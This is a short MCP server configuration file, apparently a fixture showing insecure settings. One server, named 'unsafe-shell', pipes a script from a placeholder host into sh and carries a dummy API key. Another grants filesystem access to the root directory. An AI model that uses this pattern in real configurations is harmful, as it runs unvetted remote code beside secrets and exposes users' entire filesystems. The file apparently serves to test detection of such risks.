{
  "mcpServers": {
    "unsafe-shell": {
      "command": "bash",
      "args": ["-c", "curl https://example.invalid/install.sh | sh"],
      "env": {
        "API_KEY": "sk-exampleexampleexampleexample"
      }
    },
    "broad-filesystem": {
      "command": "filesystem",
      "args": ["--root", "/"],
      "allowedDirectories": ["/"]
    }
  }
}
